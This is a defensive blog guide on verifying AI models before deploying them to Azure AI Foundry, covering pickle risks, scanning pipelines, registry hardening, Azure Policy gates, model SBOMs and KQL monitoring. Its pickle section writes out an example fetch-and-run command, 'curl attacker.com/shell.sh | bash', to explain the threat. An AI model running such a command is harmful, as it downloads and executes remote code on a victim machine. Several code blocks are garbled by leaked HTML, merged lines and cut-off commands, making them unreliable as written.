Secure AI Supply Chain: Verifying Models Before Deploying to Azure AI Foundry
A data scientist pulled a community model from the Foundry catalog and deployed it to a production hub. The model contained a pickle deserialization payload that executed under the hub managed identity, giving the attacker access to Key Vault and connected storage. This guide covers model provenance verification, automated scanning pipelines, registry hardening, and the Azure Policy controls that prevent untrusted models from reaching production compute.
The Model That Called Home on First Load
A healthcare analytics team needed a specialized medical NLP model for their Azure AI Foundry RAG pipeline. A senior data scientist found a fine-tuned model on Hugging Face with strong benchmark scores, pulled it through the Foundry model catalog, and deployed it as a managed online endpoint. Within four hours, the endpoint's managed identity had enumerated every secret in the hub's connected Key Vault. The model's config.json contained a serialized pickle object in a custom callback that executed on model load, not during inference. The team's content filters, prompt shields, and rate limits were irrelevant because the attack happened before a single inference request was processed.
This is not a theoretical scenario. Researchers at JFrog, HiddenLayer, and Trail of Bits have documented hundreds of models on public registries containing malicious payloads embedded in pickle files, safetensors metadata, or custom tokenizer code. The Azure AI Foundry security guide covers the threat model at the platform level. This article is the operational playbook for the supply chain layer: how to verify, scan, gate, and monitor every model before it reaches your Foundry compute.
Why AI Model Supply Chains Are Different from Software Supply Chains
Software supply chain security has mature tooling: SBOMs, signed packages, provenance attestations (SLSA), and vulnerability databases (CVE/NVD). AI model supply chains have almost none of that infrastructure in production today.
The fundamental difference is the artifact format. A Python package is source code you can audit. A model weight file is a binary blob that contains learned parameters, but the serialization format can also contain executable code. Python's pickle module is the most notorious example: it deserializes arbitrary Python objects, which means loading a pickle file can execute arbitrary code. But pickle is not the only vector.
Attack Vectors in Model Artifacts
| Vector | File Types | Execution Trigger | Detection Difficulty |
|---|---|---|---|
| Pickle deserialization | .pkl, .pt, .bin | Model load (torch.load()) | Medium: scanners exist |
| Custom tokenizer code | tokenizer.py, __init__.py | Tokenizer initialization | Low: visible in source |
| Safetensors metadata injection | .safetensors | Metadata parsing in custom loaders | High: often trusted as safe |
| ONNX custom operators | .onnx | Runtime operator registration | High: binary inspection needed |
| Notebook execution | .ipynb in model repo | Manual execution by data scientist | Low: but relies on human caution |
| Model card script injection | README.md with HTML/JS | Rendered in web UI | Medium: CSP should block |
safetensors format was created specifically to avoid pickle's code execution risk. It stores tensors as raw bytes with a JSON header and does not support arbitrary object serialization. However, some model loading pipelines read safetensors metadata and pass values to eval() or exec() in custom preprocessing code. The format is safe; the code around it might not be.
Model Provenance: Knowing What You Are Deploying
Provenance answers three questions: who created this model, what data was it trained on, and has it been modified since creation?
Hugging Face Model Cards and Signatures
Hugging Face introduced commit signing for model repositories in 2024. Models signed with GPG keys show a verified badge on the model card. In practice, fewer than 5% of community models are signed. Microsoft-published models in the Foundry catalog are signed, but models from the broader Hugging Face ecosystem that appear in Foundry's catalog are not necessarily verified.
Check signature status before pulling any model:
# Check if a model repo has signed commits
huggingface-cli repo info <org>/<model-name> --revision main# Verify GPG signature on a specific commit
git -C <local-model-dir> log --show-signature -1
Model Cards as Security Documentation
A model card should tell you:
- Training data sources and any known biases
- Fine-tuning methodology and hyperparameters
- Intended use cases and out-of-scope applications
- Known limitations and failure modes
From a security perspective, the critical field is the training data declaration. If a model was fine-tuned on data that includes your industry's regulated content (HIPAA, PCI, GDPR-scoped data), deploying it may create compliance obligations even if you did not supply the training data yourself.
Building an Internal Model Registry
The single most impactful control for AI supply chain security is never deploying directly from a public registry to production. Every model goes through an internal registry first.
# Create a dedicated Azure Container Registry for model artifacts
az acr create \
--name prodmodelregistry \
--resource-group rg-ai-platform \
--sku Premium \
--admin-enabled false \
--public-network-enabled false# Import a verified model from Hugging Face to internal registry
# After scanning (see next section), push the model artifact
az acr import \
--name prodmodelregistry \
--source docker.io/library/model-artifact:v1.2.0 \
--image verified-models/medical-nlp:v1.2.0-scanned
Tag every imported model with scan results metadata:
# Add scan metadata as OCI annotations
oras push prodmodelregistry.azurecr.io/verified-models/medical-nlp:v1.2.0-scanned \
--annotation "security.scan.tool=modelscan" \
--annotation "security.scan.result=clean" \
--annotation "security.scan.date=2026-06-23" \
--annotation "security.provenance.source=huggingface/medical-nlp-v1" \
--annotation "security.provenance.signer=microsoft" \
./model-weights/
Automated Model Scanning Pipeline
Manual review does not scale. A production AI platform needs automated scanning at two gates: when a model enters the internal registry, and before it deploys to a Foundry endpoint.
Scanning Tools Comparison
| Tool | What It Detects | Format Support | Integration |
|---|---|---|---|
| ModelScan (ProtectAI) | Pickle exploits, unsafe ops | PyTorch, TF, Keras, ONNX | CLI, Python API, CI/CD |
| Fickling (Trail of Bits) | Pickle opcode analysis | Pickle files only | CLI, Python API |
| NB Defense | Notebook credentials, PII | Jupyter notebooks | CLI, pre-commit hook |
| Safetensors Audit | Metadata injection patterns | Safetensors | Python script |
| Semgrep (custom rules) | Unsafe model loading patterns | Python source | CI/CD, IDE |
GitHub Actions Scanning Pipeline
name: Model Security Scan
on:
push:
paths:
<ul class="list-disc pl-6 mb-4 space-y-2">
<li class="text-gray-600 ml-6">'models/**'</li>
</ul>
workflow_dispatch:
inputs:
model_path:
description: 'Path to model artifact'
required: truejobs:
scan:
runs-on: ubuntu-latest
steps:
<ul class="list-disc pl-6 mb-4 space-y-2">
<li class="text-gray-600 ml-6">uses: actions/checkout@v4</li>
</ul>
- name: Install scanning tools
<ul class="list-disc pl-6 mb-4 space-y-2">
<li class="text-gray-600 ml-6">name: Run ModelScan</li>
</ul>
run: |
modelscan scan -p ${{ inputs.model_path || 'models/' }} \
--output-format json \
--output-file scan-results.json
- name: Run Fickling on pickle files
<ul class="list-disc pl-6 mb-4 space-y-2">
<li class="text-gray-600 ml-6">name: Evaluate scan results</li>
</ul>
run: |
python3 -c "
import json, sys
results = json.load(open('scan-results.json'))
issues = results.get('issues', [])
critical = [i for i in issues if i['severity'] in ('CRITICAL', 'HIGH')]
if critical:
print(f'BLOCKED: {len(critical)} critical/high issues found')
for i in critical:
print(f' - {i["description"]} in {i["source"]}')
sys.exit(1)
print(f'PASSED: {len(issues)} low/info issues, 0 critical')
"
- name: Push to ACR if clean
<h3 id="pickle-deserialization-the-specific-threat" class="text-xl font-bold mt-6 mb-3 text-gray-900">Pickle Deserialization: The Specific Threat</h3>Python's pickle module uses opcodes to reconstruct objects. The <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">REDUCE</code> opcode calls a callable with arguments, which means a pickle file can encode <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">os.system("curl attacker.com/shell.sh | bash")</code> and it will execute when <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">pickle.load()</code> runs. PyTorch's <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">torch.load()</code> uses pickle by default.
The defense is straightforward: never use <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">torch.load()</code> on untrusted files. Use <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">torch.load(weights_only=True)</code> (added in PyTorch 2.0) or convert to safetensors format before deployment.
python
# UNSAFE: executes arbitrary code in pickle
model = torch.load("untrusted_model.pt")# SAFE: only loads tensor data, rejects arbitrary objects model = torch.load("untrusted_model.pt", weights_only=True)
# SAFEST: convert to safetensors format in quarantine environment from safetensors.torch import save_file, load_file
# In quarantine VM (isolated, no network, disposable) state_dict = torch.load("untrusted_model.pt", weights_only=True) save_file(state_dict, "verified_model.safetensors")
# In production pipeline model_weights = load_file("verified_model.safetensors")
<h2 id="azure-policy-gates-for-foundry-model-deployments" class="text-2xl font-bold mt-8 mb-4 text-gray-900">Azure Policy Gates for Foundry Model Deployments</h2>Azure Policy is your enforcement layer. Scanning catches known threats; policy prevents unscanned models from deploying at all.
<h3 id="deny-untagged-model-deployments" class="text-xl font-bold mt-6 mb-3 text-gray-900">Deny Untagged Model Deployments</h3>
Create a custom policy that requires model deployments to have a scan result annotation:
json
{
"mode": "All",
"policyRule": {
"if": {
"allOf": [
{
"field": "type",
"equals": "Microsoft.MachineLearningServices/workspaces/onlineEndpoints/deployments"
},
{
"not": {
"field": "tags['security.scan.result']",
"equals": "clean"
}
}
]
},
"then": {
"effect": "deny"
}
},
"parameters": {}
}
<h3 id="restrict-model-sources-to-internal-registry" class="text-xl font-bold mt-6 mb-3 text-gray-900">Restrict Model Sources to Internal Registry</h3>bash
# Assign policy to deny model deployments from external registries
az policy assignment create \
--name 'require-internal-model-registry' \
--display-name 'Require models from internal ACR only' \
--policy '<h3 id="separate-hubs-for-experimentation-vs-production" class="text-xl font-bold mt-6 mb-3 text-gray-900">Separate Hubs for Experimentation vs. Production</h3>The <a href="/blog/azure-ai-foundry-security-threat-model-rbac-governance" class="text-[#1D4ED8] underline hover:text-[#1E3A8A] font-medium">AI Foundry security guide</a> recommends hub separation. For supply chain security specifically, the pattern is:
<ol class="list-decimal pl-6 mb-4 space-y-2">
<li class="text-gray-600"><strong>Sandbox hub</strong>: data scientists can pull any model from the catalog. No production data access. Managed network set to <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">AllowInternetOutbound</code>. Models deployed here are for evaluation only.</li>
<li class="text-gray-600"><strong>Staging hub</strong>: only models from the internal ACR can be deployed. Automated scanning gate runs before import. Connected to staging data.</li>
<li class="text-gray-600"><strong>Production hub</strong>: <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">AllowOnlyApprovedOutbound</code> network isolation. Azure Policy denies any model deployment without scan tags. Connected to production data stores with Purview integration.</li>
</ol>
<h2 id="model-sbom-tracking-what-is-inside-your-models" class="text-2xl font-bold mt-8 mb-4 text-gray-900">Model SBOM: Tracking What Is Inside Your Models</h2>
Software Bill of Materials (SBOM) for models is an emerging practice. Unlike software SBOMs (which list packages and versions), a model SBOM documents:
<ul class="list-disc pl-6 mb-4 space-y-2">
<li class="text-gray-600">Base model architecture and version</li>
<li class="text-gray-600">Training dataset references (not the data itself)</li>
<li class="text-gray-600">Fine-tuning parameters and methodology</li>
<li class="text-gray-600">Dependencies required for inference (Python packages, CUDA version)</li>
<li class="text-gray-600">Serialization format and any custom operators</li>
</ul>
<h3 id="generating-a-model-sbom" class="text-xl font-bold mt-6 mb-3 text-gray-900">Generating a Model SBOM</h3>
python
import json
from datetime import datetimedef generate_model_sbom(model_name, model_path, base_model, training_info): sbom = { "sbomVersion": "1.0", "modelName": model_name, "generatedAt": datetime.utcnow().isoformat(), "provenance": { "baseModel": base_model, "source": training_info.get("source", "internal"), "commitHash": training_info.get("commit_hash"), "signatureVerified": training_info.get("signed", False), }, "artifacts": [], "dependencies": [], "securityMetadata": { "scanTool": "modelscan", "scanDate": None, "scanResult": None, "format": "safetensors", "picklePresent": False, } }
# Enumerate model files
import os
for root, dirs, files in os.walk(model_path):
for f in files:
fpath = os.path.join(root, f)
sbom["artifacts"].append({
"filename": f,
"size": os.path.getsize(fpath),
"sha256": compute_sha256(fpath),
"format": f.split(".")[-1],
})
if f.endswith((".pkl", ".pt", ".bin")):
sbom["securityMetadata"]["picklePresent"] = True
return sbom
Store the SBOM alongside the model artifact in your internal ACR. When a deployment is created in Foundry, your CI/CD pipeline can pull the SBOM and verify that the scan date is recent and the result is clean before proceeding.<h2 id="runtime-monitoring-detecting-compromised-models-post-deployment" class="text-2xl font-bold mt-8 mb-4 text-gray-900">Runtime Monitoring: Detecting Compromised Models Post-Deployment</h2>
Even with pre-deployment scanning, runtime monitoring catches behaviors that static analysis misses: models that phone home during inference, models that leak training data through carefully crafted prompts, or models that behave differently after a specific number of requests.
<h3 id="kql-anomalous-outbound-connections-from-foundry-compute" class="text-xl font-bold mt-6 mb-3 text-gray-900">KQL: Anomalous Outbound Connections from Foundry Compute</h3>
kusto
AzureDiagnostics
| where ResourceType == "WORKSPACES"
| where Category == "ComputeInstanceEvent" or Category == "OnlineEndpointTraffic"
| where properties_s contains "outbound" or properties_s contains "egress"
| extend DestinationIP = extract("destinationAddress=([^,]+)", 1, properties_s)
| where DestinationIP !startswith "10." and DestinationIP !startswith "172.16."
| summarize ConnectionCount = count(), FirstSeen = min(TimeGenerated),
LastSeen = max(TimeGenerated) by DestinationIP, ResourceId
| where ConnectionCount > 10
| order by ConnectionCount desc
Alert on any outbound connection from a managed online endpoint to an IP address outside your known Azure service ranges. In <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">AllowOnlyApprovedOutbound</code> mode, these connections should be blocked, but the alert catches misconfigurations.<h3 id="kql-model-deployment-from-non-approved-source" class="text-xl font-bold mt-6 mb-3 text-gray-900">KQL: Model Deployment from Non-Approved Source</h3>
kusto
AzureActivity
| where OperationNameValue == "Microsoft.MachineLearningServices/workspaces/onlineEndpoints/deployments/write"
| where ActivityStatus == "Succeeded"
| extend DeploymentDetails = parse_json(Properties)
| extend ModelSource = tostring(DeploymentDetails.modelSource)
| where ModelSource !contains "prodmodelregistry.azurecr.io"
| project TimeGenerated, Caller, ResourceGroup, ModelSource, ResourceId
| order by TimeGenerated desc
<h3 id="inference-payload-anomaly-detection" class="text-xl font-bold mt-6 mb-3 text-gray-900">Inference Payload Anomaly Detection</h3>Monitor for unusual inference patterns that indicate model probing or extraction attempts:
kusto
// Detect potential model extraction: high volume structured queries from single identity
AMLOnlineEndpointConsoleLog
| where Message contains "request_id"
| extend RequestCaller = extract("caller=([^,]+)", 1, Message)
| summarize RequestCount = count(), AvgLatency = avg(DurationMs) by RequestCaller, bin(TimeGenerated, 1h)
| where RequestCount > 500
| order by RequestCount desc
<h2 id="supply-chain-security-for-fine-tuned-models" class="text-2xl font-bold mt-8 mb-4 text-gray-900">Supply Chain Security for Fine-Tuned Models</h2>Fine-tuning introduces a second supply chain risk: the training data. A model fine-tuned on poisoned data produces biased or manipulated outputs without any malicious code in the model files themselves. This is a data integrity attack, not a code execution attack, and it bypasses every scanning tool discussed above.
<h3 id="mitigations-for-training-data-integrity" class="text-xl font-bold mt-6 mb-3 text-gray-900">Mitigations for Training Data Integrity</h3>
<ul class="list-disc pl-6 mb-4 space-y-2">
<li class="text-gray-600">Store all training datasets in versioned blob storage with soft delete enabled</li>
<li class="text-gray-600">Require signed commits for any changes to training data repositories</li>
<li class="text-gray-600">Run automated data validation checks: schema validation, statistical distribution checks, and outlier detection before fine-tuning jobs</li>
<li class="text-gray-600">Log the exact dataset version (commit hash or blob snapshot ID) used for each fine-tuning run in the model SBOM</li>
<li class="text-gray-600">Use <a href="/blog/microsoft-purview-information-protection-setup-guide" class="text-[#1D4ED8] underline hover:text-[#1E3A8A] font-medium">Microsoft Purview</a> sensitivity labels on training data to enforce access controls</li>
</ul>
<h3 id="federated-credentials-for-ci-cd-model-pipelines" class="text-xl font-bold mt-6 mb-3 text-gray-900">Federated Credentials for CI/CD Model Pipelines</h3>
Your model deployment pipeline should authenticate to Azure using <a href="/blog/flexible-federated-identity-credentials-entra-github-terraform" class="text-[#1D4ED8] underline hover:text-[#1E3A8A] font-medium">workload identity federation</a>, not stored secrets. A compromised secret in a CI/CD pipeline gives an attacker persistent access to deploy arbitrary models. Federated credentials are short-lived and scoped to the specific pipeline run.
bash
# Create federated credential for GitHub Actions model deployment pipeline
az ad app federated-credential create \
--id Integration with Defender for Cloud
Defender for Cloud provides AI workload protection that complements the supply chain controls in this guide. The coverage as of mid-2026:| Control | Defender for Cloud | Supply Chain Pipeline |
|---|---|---|
| Pickle exploit detection | No | Yes (ModelScan) |
| Anomalous inference volume | Yes | No (runtime only) |
| Model provenance verification | No | Yes (SBOM + signatures) |
| Prompt injection detection | Yes | No (not supply chain) |
| Unauthorized model deployment | Partial (activity alerts) | Yes (Azure Policy deny) |
| Training data integrity | No | Yes (versioning + Purview) |
| Container vulnerability in model endpoint | Yes | Partial (base image scan) |
Hardening Checklist
- [ ] Internal model registry (ACR) deployed with private endpoint and admin access disabled
- [ ] No direct deployments from public model catalogs to production hubs: Azure Policy enforced
- [ ] ModelScan integrated into CI/CD pipeline scanning all model artifacts before registry push
- [ ] Pickle files blocked or converted to safetensors format before entering internal registry
- [ ] Model SBOM generated and stored alongside every model artifact in ACR
- [ ] Hub separation enforced: sandbox (open catalog) / staging (internal ACR) / production (policy-gated)
- [ ] Federated credentials used for all CI/CD model deployment pipelines: no stored secrets
- [ ] Managed network isolation set to
AllowOnlyApprovedOutboundon production hubs - [ ] KQL alerts deployed for non-approved model sources, anomalous outbound connections, and high-volume inference
- [ ] Training data versioned with blob snapshots and Purview sensitivity labels applied
- [ ] Model provenance (commit signatures) verified before any model enters the internal registry
- [ ] Defender for Cloud AI workload protection enabled alongside the supply chain scanning pipeline
Frequently Asked Questions
Why is pickle deserialization dangerous for AI model files?
Python's pickle module reconstructs arbitrary Python objects from serialized bytes, including objects that execute code on instantiation. The REDUCE opcode in the pickle protocol calls any Python callable with supplied arguments, which means a pickle file can encode os.system("malicious command") and it executes the moment pickle.load() or torch.load() runs. Because PyTorch uses pickle by default for model checkpoints (.pt, .bin files), loading an untrusted model file is functionally equivalent to running an untrusted script. The mitigation is to use torch.load(weights_only=True) or convert all models to safetensors format, which stores only tensor data without code execution capability.
How does an internal model registry prevent supply chain attacks in Azure AI Foundry?
An internal Azure Container Registry acts as a trust boundary between public model sources and your production Foundry compute. Every model from the public Hugging Face catalog or Foundry model registry must first be pulled into a quarantine environment, scanned with tools like ModelScan for malicious payloads, converted to safe serialization formats, and tagged with scan metadata before being pushed to the internal ACR. Azure Policy on your production Foundry hub then denies any model deployment that does not originate from the internal registry or lacks clean scan tags. This two-gate approach (scan before registry entry, policy before deployment) ensures no unverified model reaches production compute.
What is a model SBOM and why does it matter for AI security?
A Model Software Bill of Materials documents the provenance and composition of a machine learning model: the base architecture, training data references, fine-tuning methodology, inference dependencies, serialization format, and security scan results. Unlike software SBOMs that track package dependencies, model SBOMs track the data and training lineage that determines model behavior. This matters for security because a model fine-tuned on poisoned data produces manipulated outputs without any detectable malicious code. The SBOM provides the audit trail needed to trace a model's outputs back to its training inputs when investigating incidents.
Can safetensors files contain malicious code?
The safetensors format itself cannot contain executable code because it stores only raw tensor bytes with a JSON metadata header. However, the loading code around safetensors files can introduce risk. If a custom model loading pipeline reads safetensors metadata and passes values to eval() or exec(), the metadata becomes an injection vector. The defense is twofold: use the standard safetensors library's load_file() function (which does not execute metadata), and audit any custom model loading code for unsafe deserialization patterns using Semgrep or similar static analysis tools.
Recommended tool: Pluralsight
Level up your security skills with expert-led courses. Free 10-day trial, then access thousands of courses across cloud security, networking, and certifications.
Get weekly security insights
Cloud security, zero trust, and identity guides — straight to your inbox.
Continue Learning
AI Security Engineer Roadmap
The fastest-growing specialty in security.
Microsoft Cloud Solution Architect
Cloud Solution Architect with deep expertise in Microsoft Azure and a strong background in systems and IT infrastructure. Passionate about cloud technologies, security best practices, and helping organizations modernize their infrastructure.
Share this article
Questions & Answers
Related Articles
Need Help with Your Security?
Our team of security experts can help you implement the strategies discussed in this article.
Contact Us